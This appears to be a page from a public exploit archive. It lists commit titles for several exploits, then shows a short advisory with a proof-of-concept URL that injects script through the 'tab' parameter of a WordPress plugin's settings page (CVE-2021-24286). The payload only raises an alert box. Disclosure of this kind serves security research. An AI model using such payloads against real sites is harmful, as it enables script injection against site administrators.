4f2cf56b31
11 changes to exploits/shellcodes Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection OpenSIS 8.0 'modname' - Directory Traversal Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload Budget and Expense Tracker System 1.0 - Arbitrary File Upload FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting Jetty 9.4.37.v20210219 - Information Disclosure Clinic Management System 1.0 - SQL injection to Remote Code Execution Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated) Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
13 lines
No EOL
566 B
Text
13 lines
No EOL
566 B
Text
# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)
|
|
# Date: 2/3/2021
|
|
# Author: 0xB9
|
|
# Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip
|
|
# Version: 1.3.0
|
|
# Tested on: Windows 10
|
|
# CVE: CVE-2021-24286
|
|
|
|
1. Description:
|
|
This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS.
|
|
|
|
2. Proof of Concept:
|
|
wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/); |